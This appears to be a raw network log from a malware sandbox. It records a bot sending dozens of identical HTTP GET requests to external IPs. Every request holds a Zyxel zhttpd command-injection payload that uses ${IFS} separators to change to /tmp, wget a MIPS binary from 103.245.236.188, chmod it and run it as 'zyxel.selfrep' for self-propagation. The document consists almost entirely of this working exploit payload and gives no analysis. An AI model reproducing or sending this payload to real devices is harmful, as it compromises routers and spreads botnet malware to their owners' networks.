                                                Jan 12, 2024 18:24:38.939516068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5230192.168.2.134316442.218.221.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.939574003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5231192.168.2.1360080104.69.48.49443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.939629078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5232192.168.2.134127814.138.114.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.939692020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5233192.168.2.1339862172.99.0.251443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.939743996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5234192.168.2.1341606102.156.171.206443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.939815044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5235192.168.2.1357292169.89.75.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.939868927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5236192.168.2.1357716220.168.221.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.939913034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5237192.168.2.134352295.60.133.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.939970016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5238192.168.2.1349076114.10.209.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.940018892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5239192.168.2.1342818108.81.69.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.940078974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5240192.168.2.135860070.89.235.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.940126896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5241192.168.2.133963077.32.3.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.940165997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5242192.168.2.1348600133.1.79.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.940210104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5243192.168.2.1349880205.45.180.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.940256119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5244192.168.2.1348056144.104.117.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.940313101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5245192.168.2.1352714114.201.138.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.940371990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5246192.168.2.1346152133.78.106.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.940423012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5247192.168.2.136095424.54.57.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.940476894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5248192.168.2.1335334195.223.188.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.940535069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5249192.168.2.1337494203.147.133.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.940593958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5250192.168.2.135265837.224.47.192443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.940639019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5251192.168.2.1360646157.8.76.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.940704107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5252192.168.2.1351034177.56.102.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.940756083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5253192.168.2.1357938107.238.101.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.940810919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5254192.168.2.1338998153.95.144.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.940886021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5255192.168.2.1341704121.3.168.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.940924883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5256192.168.2.1338192216.145.234.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.940973997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5257192.168.2.1355140212.195.97.244443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.941055059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5258192.168.2.1344168101.203.224.78443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.941098928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5259192.168.2.134827845.135.147.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.941173077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5260192.168.2.1341276154.146.149.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.941222906 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5261192.168.2.1334068167.77.103.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.941276073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5262192.168.2.135162423.113.59.136443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.941338062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5263192.168.2.135362681.108.250.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.941390991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5264192.168.2.134773068.150.150.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.941458941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5265192.168.2.1359108211.192.22.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.941505909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5266192.168.2.1359108178.153.153.162443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.941556931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5267192.168.2.1350338177.44.80.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.941627026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5268192.168.2.1335628107.55.200.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.941670895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5269192.168.2.1348988174.208.196.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.941723108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5270192.168.2.134674494.60.238.4443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.941800117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5271192.168.2.1359780161.8.219.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.941859961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5272192.168.2.1346324125.111.57.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.941921949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5273192.168.2.1340614133.97.94.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.941942930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5274192.168.2.133865061.38.156.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.941997051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5275192.168.2.1359182105.249.89.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.942066908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5276192.168.2.1359100106.211.16.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.942106009 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5277192.168.2.134242061.227.37.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.942189932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5278192.168.2.135576040.90.95.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.942213058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5279192.168.2.135983223.225.83.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.942317963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5280192.168.2.134730243.165.91.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.942343950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5281192.168.2.1351374204.244.67.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.942419052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5282192.168.2.1341978131.101.150.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.942462921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5283192.168.2.1335624147.247.217.242443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.942526102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5284192.168.2.1339000120.251.173.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.942559958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5285192.168.2.1352618149.220.139.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.942637920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5286192.168.2.133747253.221.136.193443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.942675114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5287192.168.2.1354720174.111.149.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.942729950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5288192.168.2.1340454164.85.208.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.942786932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5289192.168.2.13454569.102.38.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.942842960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5290192.168.2.1342956128.122.69.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.942913055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5291192.168.2.1340480187.113.99.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:38.942981958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                5292192.168.2.1357508196.33.147.4443
                                                TimestampBytes transferredDirectionData
